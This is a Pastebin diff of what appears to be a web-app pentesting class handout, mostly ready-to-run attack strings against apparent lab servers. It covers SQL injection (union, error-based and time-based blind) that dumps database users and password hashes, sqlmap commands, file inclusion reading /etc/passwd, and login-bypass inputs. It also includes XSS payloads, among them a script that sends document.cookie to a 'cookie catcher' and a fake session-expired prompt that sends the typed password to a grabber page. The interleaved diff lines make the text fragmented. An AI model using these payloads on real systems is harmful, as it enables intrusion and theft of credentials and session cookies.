View difference between Paste ID: <a href="/qCGwQDwu">qCGwQDwu</a> and <a href="/nVzsHCvJ">nVzsHCvJ</a> - Pastebin.com

View difference between Paste ID: qCGwQDwu and nVzsHCvJ

SHOW: | | - or go back to the newest paste.

1		###########################################
2		# Advanced Web App Pentester Night School #
3		###########################################
4
5
6
7
8		#######################
9		# Attacking PHP/MySQL #
10	-	#########################
10	+
11	-	# Class Virtual Machine #
11	+
12	-	#########################
12	+	Go to LAMP Target homepage
13		http://54.172.112.249/
14
15	-	Here is the VMWare virtual machine for the class:
15	+
16
17	-	https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip
17	+	Clicking on the Acer Link:
18	-	user: infosecaddicts
18	+	http://54.172.112.249/acre2.php?lap=acer
19	-	pass: infosecaddicts
19	+
20		- Found parameter passing (answer yes to question 1)
21		- Insert ' to test for SQLI
22	-	Let's have you connect to the VPN. I wanted to make sure that I did some of the stuff on my local virtual machines because I want you to do the hunting for vulnerable hosts to attack.
22	+
23	-	If I attack the live targets in the lab then I'll end up giving away a lot of the little secrets that I want you to discover.
23	+	http://54.172.112.249/acre2.php?lap=acer'
24
25
26		Page returns the following error:
27		You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''acer''' at line 1
28	-	So, let's start with some lab fun (just a little bit)...lol. Here are the instructions for connecting to the VPN:
28	+
29	-	https://s3.amazonaws.com/infosecaddictsfiles/Strategic-Security-2017-VPN-Info.pdf
29	+
30	-	vpn username: {first_initial.last_name} example: j.mccray
30	+
31	-	vpn password: !@#$vpn4321VPN
31	+
32		We do this using the ORDER BY
33		http://54.172.112.249/acre2.php?lap=acer' order by 100-- +
34
35	-	If you wants some scanning tips you should take a look at the following document:
35	+
36	-	https://s3.amazonaws.com/infosecaddictsfiles/LabNetworkScanningV4.pdf
36	+
37
38
39
40		http://54.172.112.249/acre2.php?lap=acer' order by 50-- +
41
42		Page returns the following error:
43	-	Go to LAMP Target homepage in Firefox
43	+
44	-	---------------------------Paste this into Firefox-----------------------------------
44	+
45	-	http://45.63.104.73/
45	+
46	-	-------------------------------------------------------------------------------------
46	+
47		http://54.172.112.249/acre2.php?lap=acer' order by 25-- +
48		Page returns the following error:
49	-	Clicking on the Acer Link will take you to this page:
49	+
50	-	---------------------------Paste this into Firefox-----------------------------------
50	+
51	-	http://45.63.104.73/acre2.php?lap=acer
51	+
52	-	-------------------------------------------------------------------------------------
52	+
53		http://54.172.112.249/acre2.php?lap=acer' order by 12-- +
54
55		Page returns the following error:
56		Unknown column '50' in 'order clause'
57
58	-	---------------------------Paste this into Firefox-----------------------------------
58	+
59	-	http://45.63.104.73/acre2.php?lap=acer'
59	+
60	-	-------------------------------------------------------------------------------------
60	+	http://54.172.112.249/acre2.php?lap=acer' order by 6-- +
61		---Valid page returned for 5 and 6...error on 7 so we know there are 6 columns
62
63
64
65		Now we build out the union all select statement with the correct number of columns
66
67		Reference:
68		http://www.techonthenet.com/sql/union.php
69	-	---------------------------Paste this into Firefox-----------------------------------
69	+
70	-	http://45.63.104.73/acre2.php?lap=acer' order by 100-- +
70	+
71	-	-------------------------------------------------------------------------------------
71	+
72		http://54.172.112.249/acre2.php?lap=acer' union all select 1,2,3,4,5,6-- +
73
74
75
76	-	---------------------------Paste this into Firefox-----------------------------------
76	+
77	-	http://45.63.104.73/acre2.php?lap=acer' order by 50-- +
77	+	http://54.172.112.249/acre2.php?lap=null' union all select 1,2,3,4,5,6-- j
78	-	-------------------------------------------------------------------------------------
78	+
79		We see that a 4 and a 5 are on the screen. These are the columns that will echo back data
80
81
82		Use a cheat sheet for syntax:
83	-	---------------------------Paste this into Firefox-----------------------------------
83	+
84	-	http://45.63.104.73/acre2.php?lap=acer' order by 25-- +
84	+
85	-	-------------------------------------------------------------------------------------
85	+
86		http://54.172.112.249/acre2.php?lap=null' union all select 1,2,3,user(),5,6-- j
87
88		http://54.172.112.249/acre2.php?lap=null' union all select 1,2,3,user(),version(),6-- j
89
90	-	---------------------------Paste this into Firefox-----------------------------------
90	+	http://54.172.112.249/acre2.php?lap=null' union all select 1,2,3,user(),@@version,6-- +
91	-	http://45.63.104.73/acre2.php?lap=acer' order by 12-- +
91	+
92	-	-------------------------------------------------------------------------------------
92	+	http://54.172.112.249/acre2.php?lap=null' union all select 1,2,3,user(),@@datadir,6-- +
93
94
95		http://54.172.112.249/acre2.php?lap=null' union all select 1,2,3,user,password,6 from mysql.user -- a
96
97	-	---------------------------Paste this into Firefox-----------------------------------
97	+
98	-	http://45.63.104.73/acre2.php?lap=acer' order by 6-- +
98	+
99	-	-------------------------------------------------------------------------------------
99	+
100		Here we see parameter passing, but this one is actually a yes to question number 3 (reference a file)
101		http://54.172.112.249/showfile.php?filename=about.txt
102
103
104
105		See if you can read files on the file system:
106		http://54.172.112.249/showfile.php?filename=/etc/passwd
107
108		We call this attack a Local File Include or LFI.
109
110	-	---------------------------Paste this into Firefox-----------------------------------
110	+
111	-	http://45.63.104.73/acre2.php?lap=acer' union all select 1,2,3,4,5,6-- +
111	+
112	-	-------------------------------------------------------------------------------------
112	+
113
114		Now let's append that URL to our LFI and instead of it being Local - it is now a Remote File Include or RFI:
115		http://54.172.112.249/showfile.php?filename=https://raw.githubusercontent.com/gruntjs/grunt-contrib-connect/master/test/fixtures/hello.txt
116
117	-	---------------------------Paste this into Firefox-----------------------------------
117	+
118	-	http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,4,5,6-- j
118	+	-----------------Some Automated Testing from the strategicsec VM-----------------
119	-	-------------------------------------------------------------------------------------
119	+
120		##################################################
121		# You can download the virtual machine from here #
122		##################################################
123		https://s3.amazonaws.com/StrategicSec-VMs/StrategicsecUbuntu-v3.zip
124		user: strategicsec
125		pass: strategicsec
126
127	-	---------------------------Paste each of the lines below into Firefox-----------------------------------
127	+
128	-	http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),5,6-- j
128	+
129		cd /home/strategicsec/toolz/sqlmap-dev/
130	-	http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),version(),6-- j
130	+
131		python sqlmap.py -u "http://54.172.112.249/acre2.php?lap=acer" -b -v 3
132	-	http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),@@version,6-- +
132	+
133
134	-	http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),@@datadir,6-- +
134	+	python sqlmap.py -u "http://54.172.112.249/acre2.php?lap=acer" --current-user -v 3
135
136
137	-	http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user,password,6 from mysql.user -- a
137	+	python sqlmap.py -u "http://54.172.112.249/acre2.php?lap=acer" --current-db -v 3
138	-	-------------------------------------------------------------------------------------
138	+
139
140		python sqlmap.py -u "http://54.172.112.249/acre2.php?lap=acer" --privileges -v 3
141
142	-	########################
142	+
143	-	# Question I get a lot #
143	+	python sqlmap.py -u "http://54.172.112.249/acre2.php?lap=acer" --dbs -v 3
144	-	########################
144	+
145	-	Sometimes students ask about the "-- j" or "-- +" that I append to SQL injection attack string.
145	+
146		python sqlmap.py -u "http://54.172.112.249/acre2.php?lap=acer" --tables -v 3
147	-	Here is a good reference for it:
147	+
148	-	https://www.symantec.com/connect/blogs/mysql-injection-comments-comments
148	+
149		python sqlmap.py -u "http://54.172.112.249/acre2.php?lap=acer" --file-read=/etc/issue -v 3
150	-	Both attackers and penetration testers alike often forget that MySQL comments deviate from the standard ANSI SQL specification. The double-dash comment syntax was first supported in MySQL 3.23.3. However, in MySQL a double-dash comment "requires the second dash to be followed by at least one whitespace or control character (such as a space, tab, newline, and so on)." This double-dash comment syntax deviation is intended to prevent complications that might arise from the subtraction of negative numbers within SQL queries. Therefore, the classic SQL injection exploit string will not work against backend MySQL databases because the double-dash will be immediately followed by a terminating single quote appended by the web application. However, in most cases a trailing space needs to be appended to the classic SQL exploit string. For the sake of clarity we'll append a trailing space and either a "+" or a letter.
150	+
151
152		python sqlmap.py -u "http://54.172.112.249/acre2.php?lap=acer" --file-read=/etc/passwd -v 3
153
154
155
156	-	---------------------------Paste this into Firefox-----------------------------------
156	+
157	-	http://45.63.104.73/showfile.php?filename=about.txt
157	+
158	-	-------------------------------------------------------------------------------------
158	+
159		# Error-Based SQL Injection #
160		#############################
161		http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))--
162	-	---------------------------Paste this into Firefox-----------------------------------
162	+	http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(1))--
163	-	http://45.63.104.73/showfile.php?filename=/etc/passwd
163	+	http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(2))--
164	-	-------------------------------------------------------------------------------------
164	+	http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(3))--
165		http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(4))--
166		http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(N))-- NOTE: "N" - just means to keep going until you run out of databases
167		http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))--
168		http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'bookmaster')--
169	-	---------------------------Paste this into Firefox-----------------------------------
169	+	http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'sysdiagrams')--
170
171	-	-------------------------------------------------------------------------------------
171	+
172
173
174	-	---------------------------Paste this into Firefox-----------------------------------
174	+
175	-	http://45.63.104.73/showfile.php?filename=https://raw.githubusercontent.com/gruntjs/grunt-contrib-connect/master/test/fixtures/hello.txt
175	+
176	-	-------------------------------------------------------------------------------------
176	+
177		http://54.213.252.28/bookdetail.aspx?id=2 order by 100--
178	-	-----------------Some Automated Testing from the infosecaddicts VM-----------------
178	+	http://54.213.252.28/bookdetail.aspx?id=2 order by 50--
179		http://54.213.252.28/bookdetail.aspx?id=2 order by 25--
180		http://54.213.252.28/bookdetail.aspx?id=2 order by 10--
181		http://54.213.252.28/bookdetail.aspx?id=2 order by 5--
182		http://54.213.252.28/bookdetail.aspx?id=2 order by 6--
183	-	https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip
183	+	http://54.213.252.28/bookdetail.aspx?id=2 order by 7--
184	-	user: infosecaddicts
184	+	http://54.213.252.28/bookdetail.aspx?id=2 order by 8--
185	-	pass: infosecaddicts
185	+	http://54.213.252.28/bookdetail.aspx?id=2 order by 9--
186		http://54.213.252.28/bookdetail.aspx?id=2 union all select 1,2,3,4,5,6,7,8,9--
187
188	-	-------------------------Type each of these commands---------------------------------
188	+
189	-	cd ~/toolz/sqlmap-dev/
189	+
190		http://www.techonthenet.com/sql/union.php
191	-	python sqlmap.py -u "http://45.63.104.73/acre2.php?lap=acer" -b -v 3
191	+
192		It removes duplicate rows between the various SELECT statements.
193
194	-	python sqlmap.py -u "http://45.63.104.73/acre2.php?lap=acer" --current-user -v 3
194	+
195
196		http://54.213.252.28/bookdetail.aspx?id=-2 union all select 1,2,3,4,5,6,7,8,9--
197	-	python sqlmap.py -u "http://45.63.104.73/acre2.php?lap=acer" --current-db -v 3
197	+
198		Negating the paramter value (changing the id=2 to id=-2) will force the pages that will echo back data to be displayed.
199
200	-	python sqlmap.py -u "http://45.63.104.73/acre2.php?lap=acer" --privileges -v 3
200	+	http://54.213.252.28/bookdetail.aspx?id=-2 union all select 1,user,@@version,4,5,6,7,8,9--
201		http://54.213.252.28/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,7,8,9--
202		http://54.213.252.28/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,db_name(0),8,9--
203	-	python sqlmap.py -u "http://45.63.104.73/acre2.php?lap=acer" --dbs -v 3
203	+	http://54.213.252.28/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,master.sys.fn_varbintohexstr(password_hash),8,9 from master.sys.sql_logins--
204
205
206	-	python sqlmap.py -u "http://45.63.104.73/acre2.php?lap=acer" --tables -v 3
206	+
207
208
209	-	python sqlmap.py -u "http://45.63.104.73/acre2.php?lap=acer" --file-read=/etc/issue -v 3
209	+
210		http://54.213.252.28/bookdetail.aspx?id=(2)
211		http://54.213.252.28/bookdetail.aspx?id=(4-2)
212	-	python sqlmap.py -u "http://45.63.104.73/acre2.php?lap=acer" --file-read=/etc/passwd -v 3
212	+	http://54.213.252.28/bookdetail.aspx?id=(4-1)
213	-	-------------------------------------------------------------------------------------
213	+
214
215
216		http://54.213.252.28/bookdetail.aspx?id=2 or 1=1--
217		http://54.213.252.28/bookdetail.aspx?id=2 or 1=2--
218		http://54.213.252.28/bookdetail.aspx?id=1*1
219		http://54.213.252.28/bookdetail.aspx?id=2 or 1 >-1#
220		http://54.213.252.28/bookdetail.aspx?id=2 or 1<99#
221	-	---------------------------Paste each of the lines below into Firefox-----------------------------------
221	+	http://54.213.252.28/bookdetail.aspx?id=2 or 1<>1#
222	-	http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))--
222	+	http://54.213.252.28/bookdetail.aspx?id=2 or 2 != 3--
223	-	http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(1))--
223	+	http://54.213.252.28/bookdetail.aspx?id=2 &0#
224	-	http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(2))--
224	+
225	-	http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(3))--
225	+
226	-	http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(4))--
226	+
227	-	http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(N))-- NOTE: "N" - just means to keep going until you run out of databases
227	+
228	-	http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))--
228	+
229	-	http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'bookmaster')--
229	+
230	-	http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'sysdiagrams')--
230	+
231	-	-------------------------------------------------------------------------------------
231	+
232		Time-Based BLIND SQL INJECTION - EXTRACT DATABASE USER
233
234		3 - Total Characters
235		http://54.213.252.28/bookdetail.aspx?id=2; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
236		http://54.213.252.28/bookdetail.aspx?id=2; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
237		http://54.213.252.28/bookdetail.aspx?id=2; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- (Ok, the username is 3 chars long - it waited 10 seconds)
238	-	---------------------------Paste each of the lines below into Firefox-----------------------------------
238	+
239	-	http://45.77.162.239/bookdetail.aspx?id=2 order by 100--
239	+
240	-	http://45.77.162.239/bookdetail.aspx?id=2 order by 50--
240	+	http://54.213.252.28/bookdetail.aspx?id=2; IF ((USER)='dbo') WAITFOR DELAY '00:00:10'--
241	-	http://45.77.162.239/bookdetail.aspx?id=2 order by 25--
241	+
242	-	http://45.77.162.239/bookdetail.aspx?id=2 order by 10--
242	+
243	-	http://45.77.162.239/bookdetail.aspx?id=2 order by 5--
243	+
244	-	http://45.77.162.239/bookdetail.aspx?id=2 order by 6--
244	+
245	-	http://45.77.162.239/bookdetail.aspx?id=2 order by 7--
245	+	http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'--
246	-	http://45.77.162.239/bookdetail.aspx?id=2 order by 8--
246	+	http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--
247	-	http://45.77.162.239/bookdetail.aspx?id=2 order by 9--
247	+	http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
248	-	http://45.77.162.239/bookdetail.aspx?id=2 union all select 1,2,3,4,5,6,7,8,9--
248	+	http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'-- (Ok, first letter is a 100 which is the letter 'd' - it waited 10 seconds)
249	-	-------------------------------------------------------------------------------------
249	+
250		B - 2nd Character
251		http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
252		http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
253
254		O - 3rd Character
255		http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
256		http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'--
257		http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
258	-	---------------------------Paste this into Firefox-----------------------------------
258	+	http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
259	-	http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,2,3,4,5,6,7,8,9--
259	+	http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'--
260	-	-------------------------------------------------------------------------------------
260	+	http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'--
261		http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=111) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
262
263	-	---------------------------Paste each of the lines below into Firefox-----------------------------------
263	+
264	-	http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,4,5,6,7,8,9--
264	+
265	-	http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,7,8,9--
265	+
266	-	http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,db_name(0),8,9--
266	+
267	-	http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,master.sys.fn_varbintohexstr(password_hash),8,9 from master.sys.sql_logins--
267	+
268	-	-------------------------------------------------------------------------------------
268	+	Perform a mock penetration test against http://54.172.112.249 using what you have learned in this pastebin.
269
270		You don't need to document it for me, but go through the steps for your own understanding.
271
272
273
274	-	---------------------------Paste each of the lines below into Firefox-----------------------------------
274	+
275	-	http://45.77.162.239/bookdetail.aspx?id=(2)
275	+
276	-	http://45.77.162.239/bookdetail.aspx?id=(4-2)
276	+
277	-	http://45.77.162.239/bookdetail.aspx?id=(4-1)
277	+
278	-	-------------------------------------------------------------------------------------
278	+
279
280	-	---------------------------Paste each of the lines below into Firefox-----------------------------------
280	+
281	-	http://45.77.162.239/bookdetail.aspx?id=2 or 1=1--
281	+	https://s3.amazonaws.com/StrategicSec-Files/WebAppSampleReports.zip
282	-	http://45.77.162.239/bookdetail.aspx?id=2 or 1=2--
282	+
283	-	http://45.77.162.239/bookdetail.aspx?id=1*1
283	+
284	-	http://45.77.162.239/bookdetail.aspx?id=2 or 1 >-1#
284	+
285	-	http://45.77.162.239/bookdetail.aspx?id=2 or 1<99#
285	+
286	-	http://45.77.162.239/bookdetail.aspx?id=2 or 1<>1#
286	+
287	-	http://45.77.162.239/bookdetail.aspx?id=2 or 2 != 3--
287	+
288	-	http://45.77.162.239/bookdetail.aspx?id=2 &0#
288	+
289	-	-------------------------------------------------------------------------------------
289	+
290
291		###############################################################
292		# Question 1: What is the process that you use when you test? #
293		###############################################################
294
295		Step 1: Automated Testing
296
297		Step 1a: Web Application vulnerability scanners
298		-----------------------------------------------
299		- Run two (2) unauthenticated vulnerability scans against the target
300	-	---------------------------Paste each of the lines below into Firefox-----------------------------------
300	+
301	-	http://45.77.162.239/bookdetail.aspx?id=2; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
301	+
302	-	http://45.77.162.239/bookdetail.aspx?id=2; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
302	+
303	-	http://45.77.162.239/bookdetail.aspx?id=2; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- (Ok, the username is 3 chars long - it waited 10 seconds)
303	+
304	-	-------------------------------------------------------------------------------------
304	+
305		A good web application vulnerability scanner comparison website is here:
306	-	http://45.77.162.239/bookdetail.aspx?id=2; IF ((USER)='dbo') WAITFOR DELAY '00:00:10'--
306	+
307
308
309		Look to see if there are cases where both scanners identify the same vulnerability. Investigate these cases thoroughly, ensure that it is NOT a false positive, and report the issue.
310
311	-	---------------------------Paste each of the lines below into Firefox-----------------------------------
311	+
312	-	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'--
312	+
313	-	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--
313	+
314	-	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
314	+
315	-	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'-- (Ok, first letter is a 100 which is the letter 'd' - it waited 10 seconds)
315	+
316	-	-------------------------------------------------------------------------------------
316	+
317		Also, be sure to save the scan results and logs. I usually provide this data to the customer.
318
319	-	---------------------------Paste each of the lines below into Firefox-----------------------------------
319	+
320	-	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
320	+
321	-	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
321	+
322	-	-------------------------------------------------------------------------------------
322	+
323		I like to run DirBuster or a similar tool. This is great to find hidden gems (backups of the website, information leakage, unreferenced files, dev sites, etc).
324
325	-	---------------------------Paste each of the lines below into Firefox-----------------------------------
325	+
326	-	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
326	+
327	-	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'--
327	+
328	-	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
328	+
329	-	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
329	+
330	-	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'--
330	+
331	-	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'--
331	+
332	-	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=111) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
332	+
333	-	-------------------------------------------------------------------------------------
333	+
334
335		Step 2b: Browse through the site using the 3 question method
336		Have Burp Suite on with intercept turned off. Browse the website using the 3 question method that I've taught you in the past. When you find a place in the site where the answer to one of the 3 questions is yes - be sure to look at that individual web request in the target section of Burp Suite, right-click on that particular request and choose 'Send to Intruder'.
337
338		Take the appropriate fuzz list from https://github.com/fuzzdb-project/fuzzdb/ and load it into Intruder. A quick tip for each individual payload is to be sure to send the payload both with and without the parameter value.
339	-	Perform a mock penetration test against http://45.63.104.73 using what you have learned in this pastebin.
339	+
340		Here is what I mean:
341		http://www.site.com/page.aspx?parametername=parametervalue
342
343		When you are looking at an individual request - often times Burp Suite will insert the payload in place of the parameter value like this:
344
345		http://www.site.com/page.aspx?parametername=[ payload ]
346
347		You need to ensure that you send the payload this way, and like this below:
348
349		http://www.site.com/page.aspx?parametername=parametervalue[ payload ]
350
351		This little hint will pay huge dividends in actually EXPLOITING the vulnerabilities you find instead of just identifying them.
352	-	https://s3.amazonaws.com/infosecaddicts-Files/WebAppSampleReports.zip
352	+
353
354
355
356
357	-	###############################################################################
357	+
358	-	# What is XSS #
358	+
359	-	# https://s3.amazonaws.com/infosecaddictsfiles/2-Intro_To_XSS.pptx #
359	+
360	-	###############################################################################
360	+
361		###########################################
362	-	OK - what is Cross Site Scripting (XSS)
362	+
363
364	-	1. Use Firefox to browse to the following location:
364	+
365	-	---------------------------Paste this into Firefox-----------------------------------
365	+
366	-	http://45.63.104.73/xss_practice/
366	+
367	-	-------------------------------------------------------------------------------------
367	+
368	-	A really simple search page that is vulnerable should come up.
368	+
369		Step 2: If the answer is yes, then go down that particular attack path with a few fuzz strings (I usually do 10-20 fuzz strings per parameter)
370
371		Step 3: When you load your fuzz strings - use the following decision tree
372
373	-	2. In the search box type:
373	+
374		- If this is the case then it is most likely NOT vulnerable
375	-	<script>alert('So this is XSS')</script>
375	+
376		- Are the fuzz strings causing a WAF or LB custom error message?
377		- If this is the case then you need to find an encoding method to bypass
378	-	This should pop-up an alert window with your message in it proving XSS is in fact possible.
378	+
379	-	Ok, click OK and then click back and go back to http://45.63.104.73/xss_practice/
379	+
380		- Are the fuzz strings causing an error message that discloses the backend type?
381		- If yes, then identify DB type and find correct syntax to successfully exploit
382	-	3. In the search box type:
382	+
383		'
384	-	<script>alert(document.cookie)</script>
384	+
385		() <----- Take the parameter value and put it in parenthesis
386		(5-1) <----- See if you can perform an arithmetic function
387	-	This should pop-up an alert window with your message in it proving XSS is in fact possible and your cookie can be accessed.
387	+
388	-	Ok, click OK and then click back and go back to http://45.63.104.73/xss_practice/
388	+
389		- Are the fuzz strings rendering executable code?
390	-	4. Now replace that alert script with:
390	+
391		- Some example strings that I use are:
392	-	<script>document.location="http://45.63.104.73/xss_practice/cookie_catcher.php?c="+document.cookie</script>
392	+
393		<u>hello</u>
394		<script>alert(123);</script>
395	-	This will actually pass your cookie to the cookie catcher that we have sitting on the webserver.
395	+
396		<script>alert('xss');</script>
397		<script>alert("xss");</script>
398	-	5. Now view the stolen cookie at:
398	+
399	-	---------------------------Paste this into Firefox-----------------------------------
399	+
400	-	http://45.63.104.73/xss_practice/cookie_stealer_logs.html
400	+
401	-	-------------------------------------------------------------------------------------
401	+
402
403	-	The cookie catcher writes to this file and all we have to do is make sure that it has permissions to be written to.
403	+
404
405		-------------------------------------------------------------------------------------------
406
407		############################
408		# Trading Web App with WAF #
409		# http://54.213.131.105 #
410		############################
411	-	# A Better Way To Demo XSS #
411	+
412
413		Try the following in the search box:
414		<script>alert(123);</script>
415	-	Let's take this to the next level. We can modify this attack to include some username/password collection. Paste all of this into the search box.
415	+	<script>alert(123);</script
416		<script>alert(123)
417		<script>alert
418	-	Use Firefox to browse to the following location:
418	+	<script>
419	-	---------------------------Paste this into Firefox-----------------------------------
419	+	<script
420	-	http://45.63.104.73/xss_practice/
420	+	<scrip
421	-	-------------------------------------------------------------------------------------
421	+	<scri
422		<scr
423		<sc
424	-	Paste this in the search box
424	+	<s
425	-	----------------------------
425	+	<p
426		<
427		< s
428		Joe'+OR+1=1;--
429	-	<script>
429	+
430	-	password=prompt('Your session is expired. Please enter your password to continue',' ');
430	+
431	-	document.write("<img src=\"http://45.63.104.73/xss_practice/passwordgrabber.php?password=" +password+"\">");
431	+	Open a new tab in firefox and try this:
432	-	</script>
432	+	http://54.213.131.105/Searchresult.aspx?%u003cscript>prompt(123)%u003c/script>=ScriptName
433
434
435	-	Now view the stolen cookie at:
435	+	xss_upload.txt (Upload Bulk Order)
436	-	---------------------------Paste this into Firefox-----------------------------------
436	+	<script>alert(123);</script>
437	-	http://45.63.104.73/xss_practice/passwords.html
437	+
438	-	-------------------------------------------------------------------------------------
438	+
439		Login Box:
440
441		' or 1=1 or ''='
442		anything
443
444
445
446		Tamper Data: (notice 2 session IDs)
447
448		AcmeTrading=a4b796687b846dd4a34931d708c62b49; SessionID is md5
449		IsAdmin=yes;
450		ASP.NET_SessionId=d10dlsvaq5uj1g550sotcg45
451
452
453
454		Profile - Detail (tamper data)
455		Disposition: form-data; name="ctl00$contentMiddle$HiddenField1"\r\n\r\njoe\r\n
456		joe\|set
457
458
459
460
461
462
463
464		###########################################################
465		# Attacking an Oracle/JSP based WebApp with SQL Injection #
466		###########################################################
467
468
469
470
471
472		http://54.69.156.253:8081/bookcompany/
473
474
475		user: a' OR 'a'='a
476		pass: a' OR 'a'='a
477
478
479
480
481
482
483
484		http://54.69.156.253:8081/bookcompany/author.jsp?id=111
485
486
487		[ Search by Username ] Joe' OR 'a'='a
488
489
490
491
492
493
494
495
496
497
498
499
500		http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1
501
502
503
504		http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' OR '1'='1
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
